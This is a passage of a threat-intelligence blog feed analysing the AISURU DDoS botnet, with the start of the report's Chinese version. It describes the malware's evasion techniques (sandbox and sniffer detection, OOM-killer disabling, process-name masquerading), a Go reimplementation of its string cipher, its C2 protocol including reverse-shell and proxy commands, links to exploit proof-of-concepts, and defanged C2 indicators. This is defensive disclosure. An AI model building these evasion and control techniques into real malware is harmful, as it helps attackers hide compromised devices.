<td><a href="https://github.com/wy876/POC/blob/main/%E4%B8%89%E6%B1%87%E7%BD%91%E5%85%B3%E7%AE%A1%E7%90%86%E8%BD%AF%E4%BB%B6/%E4%B8%89%E6%B1%87%E7%BD%91%E5%85%B3%E7%AE%A1%E7%90%86%E8%BD%AF%E4%BB%B6debug.php%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?ref=blog.xlab.qianxin.com">SANHUI-GATEWAY-DEBUG-PHP-RCE</a></td>
<td>SANHUI</td>
<td>Gateway Management Software</td>
</tr>
<tr>
<td><a href="https://github.com/mcw0/PoC/blob/master/TVT-PoC.py?ref=blog.xlab.qianxin.com">TVT-OEM-API-RCE</a></td>
<td>Shenzhen TVT</td>
<td>DVR</td>
</tr>
</tbody>
</table>
<h2 id="attack-statistics">Attack Statistics</h2>
<p>The Aisuru botnet has launched attacks worldwide, spanning multiple industries. Its primary targets have been located in regions such as China, the United States, Germany, the United Kingdom, and Hong Kong. The attacks show no strong signs of selectivity, with several hundred targets hit on a daily basis.</p>
<p>DDoS attack trends&#xFF1A;<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/09/AISURU.atk.trends.png" alt="AISURU.atk.trends.png" loading="lazy"></p>
<p>Geographic distribution of victims&#xFF1A;<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/09/AISURU.atk.d.png" alt="AISURU.atk.d.png" loading="lazy"></p>
<h2 id="technical-analysis">Technical Analysis</h2>
<p>Starting on March 14, 2025, the AISURU group began distributing new bot samples. Comparing them with known source code, we found updates mainly focused on encryption methods, and the updates can be divided into two major versions.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_source.png" alt="aisuru_source.png" loading="lazy"></p>
<ol>
<li>
<p>Version 1 updates: use ECDH-P256 for key exchange, then derive a shared ChaCha20 key for encrypting network messages; DNS-TXT record decoding changed from base64+ChaCha20 to base64+XOR; new attack commands and message formats.</p>
</li>
<li>
<p>Version 2 updates: streamlined network protocol by removing ECDH-P256 key exchange; modified xxhash algorithm for message integrity verification; modified RC4 algorithm for decrypting sample strings and communication keys.</p>
</li>
</ol>
<p>Version 1 lasted only about half a month; subsequent samples primarily used Version 2. The following analysis focuses on Version 2 samples, emphasizing AISURU&apos;s anti-analysis techniques, encryption, and network protocol.</p>
<h3 id="environment-detection">Environment Detection</h3>
<p>On startup, the sample checks whether the current process command line contains any of the following strings:</p>
<pre><code>tcpdump
wireshark
tshark
dumpcap
</code></pre>
<p>It also checks the kernel&apos;s hardware identifier for strings such as:</p>
<pre><code>VMware
VirtualBox
KVM
Microsoft
QEMU
</code></pre>
<p>If any of these are detected, the program exits to hinder dynamic analysis.</p>
<h3 id="killer-evasion">Killer Evasion</h3>
<p>Linux has an OOM Killer (Out-Of-Memory Killer) that terminates processes when system memory is low. The sample disables this by writing <code>-1000</code> to <code>/proc/self/oom_score_adj</code> to gain more runtime.</p>
<p>As competitors often fight over compromised devices, device takeover is fiercely contested. For example, AISURU and Rapperbot have intense competition over nvms9000 devices. When AISURU takes a device, they often taunt Rapperbot publicly.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_fight.png" alt="aisuru_fight.png" loading="lazy"></p>
<p>Many botnets compile statically for cross-platform compatibility, avoid shared libraries, and delete their binary after execution. Other botnets use these behaviors as signals to <code>kill</code> competitors. To counter those killer tactics, the sample searches <code>/lib/</code> for <code>.so</code> shared libraries and maps them into the current process; it does not delete its file and renames it to <code>libcow.so</code>. The process name is also checked; the sample replaces the process name with one of several common names:</p>
<pre><code>telnetd
udhcpc
inetd
ntpclient
watchdog
klogd
upnpd
dhclient
</code></pre>
<h3 id="modified-rc4-algorithm">Modified RC4 Algorithm</h3>
<p>Compared to previous AIRASHI versions, the new sample no longer uses the standard RC4 algorithm to decrypt strings, nor does it use standard HMAC-SHA256 for message verification.</p>
<p>The new sample uses a modified RC4 algorithm with the key <code>PJbiNbbeasddDfsc</code>, which has not changed across multiple versions and may be a nod to the Fodcha botnet. The algorithm retains RC4&apos;s 256-byte S-box but adds new perturbations during initialization and keystream generation. An equivalent Golang implementation is shown below:</p>
<pre><code class="language-go">func AIRASHI_RC4(data []byte) []byte {
	key := make([]uint32, 4)
	keyBytes := []byte(&quot;PJbiNbbeasddDfsc&quot;)
	for i := 0; i &lt; 4; i++ {
		key[i] = binary.BigEndian.Uint32(keyBytes[i*4 : (i+1)*4])
	}

	S := make([]byte, 256)
	i := 13
	for j := 0; j &lt; 256; j++ {
		S[j] = byte(i &amp; 0xff)
		i -= 89
	}

	j := 0
	for i := 0; i &lt; 256; i++ {
		j = (j + int(S[i]) + int(key[i%4]&gt;&gt;(i%32))) % 256
		S[i], S[j] = S[j], S[i]
	}

	seed := uint32(0xE0A4CBD6)
	for i := 0; i &lt; 5; i++ {
		for k := 0; k &lt; 256; k++ {
			seed = 0x41C64E6D*seed + 12345
			t := (seed * uint32(S[k])) &gt;&gt; 24
			t1 := (seed ^ key[(i+k)%4] ^ uint32(S[k])) &amp; 0xff
			S[k] = byte(t1)
			j = (int(t1) + j + int(t)) &amp; 0xff
			S[k] = S[j]
			S[j] = byte(t1)
		}
	}

	i, j, k := 0, 0, 0
	m := uint32(1)
	result := make([]byte, 0, len(data))
	for _, byteVal := range data {
		i = (i + 1) % 256
		j = (j + int(S[i])) % 256
		k = (k + int(S[(i+j)%256])) % 256
		S[i], S[j] = S[j], S[i]
		m = rol32(m, 1)
		if (m &amp; 1) != 0 {
			m ^= 0xD800A4
		}
		t := (S[(k+j)%256] + S[(j+i)%256]) &amp; 0xff
		t1 := ((byte(m) ^ S[t]) &gt;&gt; 4) ^ rol8(byte(m)^S[t], 3)&amp;0xff
		result = append(result, byteVal^t1)
	}
	return result
}
</code></pre>
<p>The decrypted example ciphertext below yields a taunting plaintext.<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_ciphertxt.png" alt="aisuru_ciphertxt.png" loading="lazy"></p>
<p>After decrypting with AIRASHI_RC4, the plaintext reads provocatively: &quot;tHiS mOnTh At qiAnXin shitlab a NeW aisurU vErSiOn hIt oUr bOtMoN sYsTeM dOiNg tHe CHAaCha sLiDe&quot;. Our only reply: &quot;Are you feeling itchy?&quot;</p>
<h3 id="c2-extraction">C2 Extraction</h3>
<p>The sample keeps the previous C2 decoding method: decrypt strings from a table, split by <code>|</code> to obtain multiple subdomains and the main domain, then split subdomains by <code>,</code> to form FQDNs. Example:</p>
<pre><code>decrypted str: sub1,sub2,sub3|domain.tld

c2_1: sub1.domain.tld
c2_2: sub2.domain.tld
c2_3: sub3.domain.tld
</code></pre>
<p>When parsing domains, the sample still uses encrypted TXT records. Prior blog samples used base64+ChaCha20 for decoding; the new version abandons ChaCha20 and uses XOR to obtain IPs. See the Appendix CyberChef recipe for decoding details.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dns_txt_decode.png" alt="dns_txt_decode.png" loading="lazy"></p>
<h3 id="network-speed-test">Network Speed Test</h3>
<p>Recent versions added an upload speed test feature using the public Speedtest service:</p>
<ol>
<li>GET /speedtest-servers-static.php to fetch test servers</li>
<li>GET /speedtest/latency.txt to find the lowest-latency server</li>
<li>POST random data to the lowest-latency server for 10s (some samples use 100ms)</li>
</ol>
<p>This feature does not affect program execution or C2 connectivity; it only reports results back to C2. We believe the purpose is to identify nodes with good network performance for later proxy instructions. C2 can assign high-quality nodes to serve as residential proxies.</p>
<h3 id="network-protocol">Network Protocol</h3>
<p>Protocol-wise, the flow remains similar to previous versions: obtaining a shared ChaCha20 key and confirmation, but message formats and encryption algorithms were modified.</p>
<p>A new message consists of three parts: a header, random bytes, and a body. The following image shows a decoded login packet:</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/login_msg-1.png" alt="login_msg.png" loading="lazy"></p>
<p>The header has a fixed length of 8 bytes and contains four fields:</p>
<p>msgType (1 byte) + randSize (1 byte) + bodySize (2 bytes) + bodyHash (4 bytes)</p>
<p>The login packet structure includes the following fields:</p>
<pre><code class="language-c">struct login{
	uint32 stun_ip;  
	uint32 botid_len;
	char botid[botid_len];
	uint32 version;
	uint32 nodename_len;
	char nodename[nodename_len];
	uint32 cwd_len;
	char cwd[cwd_len];
	uint32 kernel_ver_len;
	char kernel_ver[kernel_ver_len];
	uint16 reserve1;
	uint8 reserve2;
	bool support_udp;
}
</code></pre>
<p>Newly supported message types and descriptions:</p>
<table>
<thead>
<tr>
<th>msgType</th>
<th>desc</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>get shared net key</td>
</tr>
<tr>
<td>1</td>
<td>key info</td>
</tr>
<tr>
<td>2</td>
<td>confirm key</td>
</tr>
<tr>
<td>3</td>
<td>login info</td>
</tr>
<tr>
<td>4</td>
<td>heartbeat</td>
</tr>
<tr>
<td>5</td>
<td>exit</td>
</tr>
<tr>
<td>6</td>
<td>attack</td>
</tr>
<tr>
<td>7</td>
<td>execute cmd</td>
</tr>
<tr>
<td>8</td>
<td>new cnc</td>
</tr>
<tr>
<td>9</td>
<td>reverse shell</td>
</tr>
<tr>
<td>10</td>
<td>proxy</td>
</tr>
<tr>
<td>101</td>
<td>report telnet scan</td>
</tr>
<tr>
<td>201</td>
<td>report killer</td>
</tr>
<tr>
<td>202</td>
<td>report netspeed</td>
</tr>
</tbody>
</table>
<p>You can see the new samples support not only DDoS attacks but also Proxy functionality. As global law enforcement increases pressure on cybercrime, demand for anonymization services is rising. Where there is demand, there is profit. Nodes controlled by botnets are natural building blocks for residential proxy services. From our case collection, this appears to be a trend in the DDoS scene in recent years: expanding business from single-purpose attacks to proxy offerings.</p>
<p>We implemented the AISURU protocol in the XLab instruction tracking system and, as expected, observed not only conventional DDoS commands but also proxy-related instructions.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_cmdtype.png" alt="aisuru_cmdtype.png" loading="lazy"></p>
<p>Clearly, AISURU is no longer satisfied with a single DDoS business model and is branching into proxy services to monetize its large node pool.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_proxy.png" alt="aisuru_proxy.png" loading="lazy"></p>
<h2 id="ioc">IoC</h2>
<h3 id="c2">C2</h3>
<pre><code>coerece[.ilovegaysex[.su
approach[.ilovegaysex[.su
ministry[.ilovegaysex[.su
lane[.ilovegaysex[.su
a.6mv1eyr328y6due83u3js6whtzuxfyhw[.ru
</code></pre>
<h3 id="reportdownload-server">Report/Download Server</h3>
<pre><code>u[.ilovegaysex[.su
updatetoto[.tw
</code></pre>
<h3 id="proxy-relay-c2">Proxy Relay C2</h3>
<pre><code>194.46.59[.169	United Kingdom|England|Exeter	AS206509|KCOM GROUP LIMITED
104.171.170[.241	United States|Virginia|Ashburn	AS7922|Comcast Cable Communications, LLC
104.171.170[.253	United States|Virginia|Ashburn	AS7922|Comcast Cable Communications, LLC
107.173.196[.189	United States|New York|Buffalo	AS36352|ColoCrossing
64.188.68[.193	United States|District of Columbia|Washington	AS46339|CSDVRS, LLC
78.108.178[.100	Czech Republic|Praha, Hlavni mesto|Prague	AS62160|Yes Networks Unlimited Ltd
</code></pre>
<h3 id="sample">Sample</h3>
<pre><code>09894c3414b42addbf12527b0842ee7011e70cfd
51d9a914b8d35bb26d37ff406a712f41d2075bc6
616a3bef8b0be85a3c2bc01bbb5fb4a5f98bf707
ccf40dfe7ae44d5e6922a22beed710f9a1812725
26e9e38ec51d5a31a892e57908cb9727ab60cf88
08e9620a1b36678fe8406d1a231a436a752f5a5e
053a0abe0600d16a91b822eb538987bca3f3ab55
</code></pre>
<h2 id="appendix">Appendix</h2>
<h3 id="cyberchef">CyberChef</h3>
<pre><code>https://gchq.github.io/CyberChef/#recipe=Fork(&apos;%5C%5Cn&apos;,&apos;%5C%5Cn&apos;,false)From_Base64(&apos;A-Za-z0-9%2B/%3D&apos;,true,false)XOR(%7B&apos;option&apos;:&apos;Hex&apos;,&apos;string&apos;:&apos;ca%20fe%20ba%20be&apos;%7D,&apos;Standard&apos;,false)To_Hex(&apos;Space&apos;,0)Change_IP_format(&apos;Hex&apos;,&apos;Dotted%20Decimal&apos;)&amp;input=Im9XamNxZz09Ig0KIm9XamVuZz09Ig0KIm9XallCdz09Ig0KIjU2NGtMZz09Ig&amp;ieol=CRLF
</code></pre>
]]></content:encoded></item><item><title><![CDATA[史上最强？揭秘11.5T级超大规模僵尸网络AISURU的内幕]]></title><description><![CDATA[<h2 id="%E6%A6%82%E8%BF%B0">&#x6982;&#x8FF0;</h2>
<p>2025&#x5E74;&#x4EE5;&#x6765;&#xFF0C;&#x5168;&#x7403;DDoS&#x653B;&#x51FB;&#x7684;&#x5E26;&#x5BBD;&#x5CF0;&#x503C;&#x4E0D;&#x65AD;&#x5237;&#x65B0;&#x5386;&#x53F2;&#x7EAA;&#x5F55;&#xFF0C;&#x4ECE;&#x5E74;&#x521D;&#x7684;<a href="https://blog.xlab.qianxin.com/large-scale-botnet-airashi-en/">3.12 Tbps</a>&#x4E00;&#x8DEF;&#x98D9;&#x5347;&#x81F3;&#x8FD1;&#x65E5;&#x60CA;&#x4EBA;&#x7684;<a href="https://x.com/Cloudflare/status/1962953494459252843?ref=blog.xlab.qianxin.com">11.5 Tbps</a>&#x3002;&#x5728;&#x591A;&#x8D77;</p>]]></description><link>https://blog.xlab.qianxin.com/super-large-scale-botnet-aisuru/</link><guid isPermaLink="false">68bfd92d428efe0001a25087</guid><category><![CDATA[DDoS]]></category><category><![CDATA[CN]]></category><category><![CDATA[Botnet]]></category><category><![CDATA[Huge]]></category><dc:creator><![CDATA[Alex.Turing]]></dc:creator><pubDate>Mon, 15 Sep 2025 02:52:17 GMT</pubDate><content:encoded><![CDATA[<h2 id="%E6%A6%82%E8%BF%B0">&#x6982;&#x8FF0;</h2>
<p>2025&#x5E74;&#x4EE5;&#x6765;&#xFF0C;&#x5168;&#x7403;DDoS&#x653B;&#x51FB;&#x7684;&#x5E26;&#x5BBD;&#x5CF0;&#x503C;&#x4E0D;&#x65AD;&#x5237;&#x65B0;&#x5386;&#x53F2;&#x7EAA;&#x5F55;&#xFF0C;&#x4ECE;&#x5E74;&#x521D;&#x7684;<a href="https://blog.xlab.qianxin.com/large-scale-botnet-airashi-en/">3.12 Tbps</a>&#x4E00;&#x8DEF;&#x98D9;&#x5347;&#x81F3;&#x8FD1;&#x65E5;&#x60CA;&#x4EBA;&#x7684;<a href="https://x.com/Cloudflare/status/1962953494459252843?ref=blog.xlab.qianxin.com">11.5 Tbps</a>&#x3002;&#x5728;&#x591A;&#x8D77;&#x5177;&#x6709;&#x9AD8;&#x5F71;&#x54CD;&#x529B;&#x6216;&#x6253;&#x7834;&#x6D41;&#x91CF;&#x7EAA;&#x5F55;&#x7684;&#x653B;&#x51FB;&#x4E8B;&#x4EF6;&#x4E2D;&#xFF0C;&#x6211;&#x4EEC;&#x5747;&#x76D1;&#x6D4B;&#x5230;&#x4E00;&#x4E2A;&#x540D;&#x4E3A;AISURU&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x5728;&#x5E55;&#x540E;&#x9891;&#x7E41;&#x6D3B;&#x52A8;&#x3002;</p>
<figure>
  <img src="https://blog.xlab.qianxin.com/content/images/2025/09/Gzxpms8XQAA9x6H.jpeg" alt="Cloudflare 11.5T ddos event">
  <figcaption>Cloudflare&#x62A5;&#x544A;11.5T&#x653B;&#x51FB;&#x4E8B;&#x4EF6;</figcaption>
</figure>
<figure>
  <img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_attack.png" alt="aisuru_attack">
  <figcaption>XLAB&#x653B;&#x51FB;&#x4E8B;&#x4EF6;&#x76D1;&#x63A7;&#x6570;&#x636E;</figcaption>
</figure>
<p>AISURU&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x6700;&#x521D;&#x4E8E;2024&#x5E74;8&#x6708;&#x7531;XLab&#x9996;&#x6B21;&#x62AB;&#x9732;&#xFF0C;&#x66FE;&#x53C2;&#x4E0E;&#x9488;&#x5BF9;<a href="https://blog.xlab.qianxin.com/large-scale-botnet-airashi-en/">&#x300A;&#x9ED1;&#x795E;&#x8BDD;&#xFF1A;&#x609F;&#x7A7A;&#x300B;&#x53D1;&#x884C;&#x5E73;&#x53F0;&#x7684;DDoS&#x653B;&#x51FB;</a>&#x3002;&#x81EA;&#x4ECA;&#x5E74;3&#x6708;&#x4EE5;&#x6765;&#xFF0C;XLab&#x5927;&#x7F51;&#x5A01;&#x80C1;&#x76D1;&#x6D4B;&#x5E73;&#x53F0;&#x6301;&#x7EED;&#x6355;&#x83B7;&#x5230;&#x8BE5;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x65B0;&#x6837;&#x672C;&#x3002;&#x591A;&#x65B9;&#x4FE1;&#x606F;&#x663E;&#x793A;&#xFF0C;&#x5176;&#x80CC;&#x540E;&#x56E2;&#x4F19;&#x5728;4&#x6708;&#x6D89;&#x5ACC;&#x5165;&#x4FB5;&#x67D0;&#x54C1;&#x724C;&#x8DEF;&#x7531;&#x5668;&#x56FA;&#x4EF6;&#x5347;&#x7EA7;&#x670D;&#x52A1;&#x5668;&#xFF0C;&#x901A;&#x8FC7;&#x4E0B;&#x53D1;&#x6076;&#x610F;&#x811A;&#x672C;&#x8FDB;&#x4E00;&#x6B65;&#x6269;&#x5C55;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x89C4;&#x6A21;&#xFF0C;&#x5F53;&#x524D;&#x8282;&#x70B9;&#x6570;&#x91CF;&#x636E;&#x79F0;&#x5DF2;&#x8FBE;30&#x4E07;&#x3002;</p>
<p>&#x66F4;&#x503C;&#x5F97;&#x8B66;&#x60D5;&#x7684;&#x662F;&#xFF0C;&#x90E8;&#x5206;AISURU&#x6837;&#x672C;&#x4E2D;&#x5D4C;&#x5165;&#x7684;&#x201C;&#x5F69;&#x86CB;&#x201D;&#x4FE1;&#x606F;&#x5DF2;&#x660E;&#x663E;&#x8D85;&#x51FA;&#x7EAF;&#x7CB9;&#x7684;&#x653B;&#x51FB;&#x610F;&#x56FE;&#xFF0C;&#x8F6C;&#x800C;&#x8BD5;&#x56FE;&#x4F20;&#x9012;&#x7279;&#x5B9A;&#x610F;&#x8BC6;&#x5F62;&#x6001;&#x5185;&#x5BB9;&#x3002;&#x57FA;&#x4E8E;&#x8FD9;&#x4E00;&#x4E25;&#x5CFB;&#x6001;&#x52BF;&#xFF0C;&#x6211;&#x4EEC;&#x51B3;&#x5B9A;&#x64B0;&#x5199;&#x672C;&#x62A5;&#x544A;&#xFF0C;&#x5411;&#x5B89;&#x5168;&#x793E;&#x533A;&#x516C;&#x5F00;&#x76F8;&#x5173;&#x7814;&#x7A76;&#x6210;&#x679C;&#xFF0C;&#x547C;&#x5401;&#x5404;&#x65B9;&#x643A;&#x624B;&#x5E94;&#x5BF9;&#xFF0C;&#x5171;&#x540C;&#x6253;&#x51FB;&#x8FD9;&#x4E00;&#x6108;&#x53D1;&#x7316;&#x7357;&#x7684;&#x7F51;&#x7EDC;&#x72AF;&#x7F6A;&#x6D3B;&#x52A8;&#x3002;</p>
<h2 id="%E5%8C%BF%E5%90%8D%E6%B6%88%E6%81%AF%E6%BA%90-xlab%E8%A7%86%E9%87%8E">&#x533F;&#x540D;&#x6D88;&#x606F;&#x6E90; &amp; XLab&#x89C6;&#x91CE;</h2>
<p>&#x7531;&#x4E8E;XLab&#x957F;&#x671F;&#x6DF1;&#x8015;DDoS&#x653B;&#x51FB;&#x8FD9;&#x4E00;&#x9886;&#x57DF;&#xFF0C;&#x5E76;&#x6301;&#x7EED;&#x53D1;&#x5E03;&#x53EF;&#x9760;&#x4E14;&#x72EC;&#x5177;&#x6DF1;&#x5EA6;&#x7684;&#x5206;&#x6790;&#x62A5;&#x544A;&#xFF0C;&#x8FD9;&#x4E3A;&#x6211;&#x4EEC;&#x4E0D;&#x4EC5;&#x5728;&#x9632;&#x5FA1;&#x8005;&#x7FA4;&#x4F53;&#x4E2D;&#x3001;&#x4E5F;&#x5728;&#x653B;&#x51FB;&#x8005;&#x5708;&#x5185;&#x79EF;&#x7D2F;&#x4E86;&#x826F;&#x597D;&#x7684;&#x58F0;&#x8A89;&#x3002;&#x8FD1;&#x65E5;&#xFF0C;&#x9488;&#x5BF9;AISURU/ AIRASHI&#x8FD9;&#x4E00;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#xFF0C;&#x6709;&#x77E5;&#x60C5;&#x7684;&#x533F;&#x540D;&#x6D88;&#x606F;&#x6E90;&#x4E3B;&#x52A8;&#x5411;&#x6211;&#x4EEC;&#x63D0;&#x4F9B;&#x4E86;&#x76F8;&#x5173;&#x60C5;&#x62A5;&#xFF0C;&#x5E0C;&#x671B;&#x80FD;&#x50CF;&#x6B64;&#x524D;&#x6253;&#x51FB;Fodcha&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x4E00;&#x6837;&#xFF0C;&#x5F7B;&#x5E95;&#x74E6;&#x89E3;AISURU&#x3002;&#x8FD9;&#x4E00;&#x7EBF;&#x7D22;&#x8BA9;&#x6211;&#x4EEC;&#x7EC8;&#x4E8E;&#x6709;&#x673A;&#x4F1A;&#x8D70;&#x8FD1;AISURU&#x80CC;&#x540E;&#x7684;&#x56E2;&#x4F19;&#xFF0C;&#x63ED;&#x5F00;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x8FD0;&#x4F5C;&#x5185;&#x5E55;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_agreement.png" alt="aisuru_agreement.png" loading="lazy"></p>
<h3 id="%E5%8C%BF%E5%90%8D%E6%B6%88%E6%81%AF%E6%BA%90">&#x533F;&#x540D;&#x6D88;&#x606F;&#x6E90;</h3>
<p>&#x636E;&#x533F;&#x540D;&#x6D88;&#x606F;&#x6E90;&#x79F0;&#xFF1A;AISURU&#x56E2;&#x4F19;&#x6709;3&#x4E2A;&#x5173;&#x952E;&#x4EBA;&#x7269;&#xFF0C;&#x4EE3;&#x53F7;&#x5206;&#x522B;&#x4E3A;Snow, Tom, Forky&#x3002;2022&#x5E74;&#xFF0C;Forky&#x8BA4;&#x8BC6;&#x4E86;&#x5F53;&#x65F6;&#x5C1A;&#x5728;&#x5FAE;&#x672B;&#x7684;Snow&#x548C;Tom&#xFF0C;&#x7ECF;&#x8FC7;catddos&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7B49;&#x51E0;&#x6B21;&#x6109;&#x5FEB;&#x7684;&#x5408;&#x4F5C;&#x4E4B;&#x540E;&#xFF0C;&#x4E09;&#x4EBA;&#x4E00;&#x62CD;&#x5373;&#x5408;&#xFF0C;&#x51B3;&#x5B9A;&#x6210;&#x7ACB;&#x73B0;&#x5728;&#x7684;AISURU&#x56E2;&#x961F;&#x3002;</p>
<ul>
<li>Snow&#xFF1A;&#x8D1F;&#x8D23;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x5F00;&#x53D1;</li>
<li>Tom&#xFF1A;&#x8D1F;&#x8D23;&#x6F0F;&#x6D1E;&#xFF0C;&#x5305;&#x62EC;0day&#x53D1;&#x73B0;&#xFF0C;Nday&#x6574;&#x5408;</li>
<li>Forky&#xFF1A;&#x8D1F;&#x8D23;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x9500;&#x552E;</li>
</ul>
<p>2025&#x5E74;4&#x6708;&#xFF0C;Tom&#x6210;&#x529F;&#x5165;&#x4FB5;totolink&#x7684;&#x4E00;&#x53F0;&#x8DEF;&#x7531;&#x5347;&#x7EA7;&#x670D;&#x52A1;&#x5668;&#xFF0C;&#x5C06;&#x56FA;&#x4EF6;&#x5347;&#x7EA7;&#x7684;url&#x8BBE;&#x5B9A;&#x4E3A;&#x4E0B;&#x8F7D;&#x6267;&#x884C;&#x6076;&#x610F;&#x811A;&#x672C;&#x3002;&#x8FD9;&#x610F;&#x5473;&#x7740;&#x6BCF;&#x53F0;&#x6267;&#x884C;&#x5347;&#x7EA7;&#x64CD;&#x4F5C;&#x7684;totolink&#x8DEF;&#x7531;&#x5668;&#xFF0C;&#x90FD;&#x6709;&#x53EF;&#x80FD;&#x611F;&#x67D3;AISURU&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_totoupdate.png" alt="aisuru_totoupdate.png" loading="lazy"></p>
<p>&#x8FD9;&#x6B21;&#x5165;&#x4FB5;&#x8BA9;AISURU&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x89C4;&#x6A21;&#x8FC5;&#x901F;&#x6500;&#x5347;&#xFF0C;&#x5728;&#x6781;&#x77ED;&#x7684;&#x65F6;&#x95F4;&#x5185;&#x7A81;&#x7834;10&#x4E07;&#x7EA7;&#x3002;&#x5982;&#x6B64;&#x5E9E;&#x5927;&#x7684;&#x89C4;&#x6A21;&#xFF0C;&#x8BA9;&#x4ED6;&#x4EEC;&#x4E5F;&#x6709;&#x70B9;&#x63AA;&#x624B;&#x4E0D;&#x53CA;&#xFF0C;&#x4E0D;&#x5F97;&#x4E0D;&#x727A;&#x7272;&#x7761;&#x89C9;&#x65F6;&#x95F4;&#xFF0C;&#x52A0;&#x73ED;&#x52A0;&#x70B9;&#x5728;&#x6570;&#x4E2A;C2 IP&#x4E0A;&#x914D;&#x7F6E;&#x7B56;&#x7565;&#xFF0C;&#x914D;&#x5408;GRE TUNNEL&#x8FDB;&#x884C;&#x5206;&#x6D41;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_gretunnel.png" alt="aisuru_gretunnel.png" loading="lazy"></p>
<p>AISURU&#x56E2;&#x4F19;&#x6210;&#x5458;&#x884C;&#x4E8B;&#x5F20;&#x626C;&#xFF0C;&#x5E38;&#x4EE5;&#x201C;&#x597D;&#x73A9;&#x201D;&#x4E3A;&#x7531;&#x5BF9;ISP&#x53D1;&#x52A8;&#x653B;&#x51FB;&#xFF0C;&#x7834;&#x574F;&#x6027;&#x975E;&#x5E38;&#x5F3A;&#x3002;&#x8FD9;&#x4F7F;&#x5F97;&#x4ED6;&#x4EEC;&#x5728;DDoS&#x5708;&#x5185;&#x53E3;&#x7891;&#x975E;&#x5E38;&#x5DEE;&#xFF0C;&#x5E38;&#x88AB;&#x522B;&#x4EBA;&#x620F;&#x79F0;&#x4E3A;&#x201C;&#x7CBE;&#x795E;&#x4E0D;&#x6B63;&#x5E38;&#x201D;&#xFF0C;&#x53EF;&#x4EE5;&#x8BF4;&#x662F;&#x6811;&#x654C;&#x65E0;&#x6570;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_respect.png" alt="aisuru_respect.png" loading="lazy"></p>
<p>4&#x6708;&#x5E95;&#xFF0C;DDoS&#x5708;&#x5185;&#x4EBA;&#x58EB;&#x51B3;&#x5B9A;&#x7ED9;AISURU&#x56E2;&#x4F19;&#x4E00;&#x70B9;&#x989C;&#x8272;&#x770B;&#x770B;&#xFF0C;&#x5F00;&#x59CB;&#x5728;&#x793E;&#x4EA4;&#x5A92;&#x4F53;&#x5404;&#x79CD;&#x7206;&#x6599;&#x3002;&#x5148;&#x662F;&#x5728;&#x4E00;&#x6B21;Cloudlare&#x8868;&#x793A;&#x7F13;&#x89E3;&#x521B;&#x8BB0;&#x5F55;&#x7684;5.8Tbps&#x7684;&#x63A8;&#x6587;&#x4E0B;&#xFF0C;&#x56DE;&#x590D;&#x9053;&#xFF1A;&#x201C;&#x8FD9;&#x662F;&#x6765;&#x81EA;340k totolink&#x8DEF;&#x7531;&#x7684;&#x653B;&#x51FB;&#xFF01;&#x201D;&#xFF1B;&#x51E0;&#x5929;&#x53C8;&#x66DD;&#x5149;&#x66F4;&#x91CD;&#x91CF;&#x7EA7;&#x7684;&#x8BC1;&#x636E;&#xFF1A;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x540E;&#x53F0;&#x622A;&#x56FE;&#x3002;&#x4ECE;&#x7EDF;&#x8BA1;&#x6570;&#x636E;&#x6765;&#x770B;&#x5F53;&#x65F6;bot&#x5728;&#x7EBF;&#x603B;&#x6570;&#x8D85;&#x8FC7;30&#x4E07;&#xFF0C;&#x5176;&#x4E2D;3&#x4E07;&#x6765;&#x81EA;&#x4E2D;&#x56FD;&#x3002;&#x4ED6;&#x4E00;&#x8FB9;&#x9AD8;&#x547C;&#x201C;welcome to totolink botnet&#x201D;&#xFF0C;&#x4E00;&#x8FB9;@<strong>totolink&#x4EE5;&#x53CA;&#x56FD;&#x9645;&#x5211;&#x8B66;</strong>&#xFF0C;&#x5E0C;&#x671B;&#x5F15;&#x8D77;&#x516C;&#x4F17;&#xFF0C;&#x6267;&#x6CD5;&#x673A;&#x6784;&#x6CE8;&#x610F;&#xFF0C;&#x4EE5;&#x5B9E;&#x73B0;&#x5BF9;AISURU&#x7684;&#x6253;&#x51FB;&#x610F;&#x56FE;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_static.png" alt="aisuru_static.png" loading="lazy"></p>
